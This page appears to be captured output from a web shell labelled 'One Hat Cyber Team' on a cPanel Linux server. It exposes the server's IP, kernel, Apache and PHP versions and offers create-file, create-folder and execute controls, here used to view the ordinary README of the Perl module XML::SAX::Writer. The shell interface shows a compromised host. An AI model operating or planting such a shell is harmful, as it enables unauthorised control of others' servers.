⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.23
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
perl-XML-SAX-Writer-0.53
/
View File Name :
README
XML::SAX::Writer - SAX2 XML Writer ================================== About this module ----------------- This module has been developed by Robin Berjon <robin@knowscape.com>. Since version 0.50, it is maintained by means of the Perl XML project [perl-xml.sourceforge.net]: - The sources are stored in the SourceForge Subversion repository: repository: https://svn.sourceforge.net/svnroot/perl-xml - Requests and comments should be sent to the Perl-XML@listserv.ActiveState.com mailing list - Bugs should be reported to RT.cpan.org Robin considered this module alpha but after years of testing on humans we believe it can be considered beta now. The version 0.50 has been created by Petr Cimprich <petr@gingerall.cz>, using patches and sugestions from RT.cpan.org. Thanks go to all those who reported bugs and suggested fixes. Usage ----- use XML::SAX::Writer; use XML::SAX::SomeDriver; my $w = XML::SAX::Writer->new; my $d = XML::SAX::SomeDriver->new(Handler => $w); $d->parse('some options...'); See http://perl-xml.sourceforge.net/perl-sax/ for more details about Perl SAX 2. License ------- This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.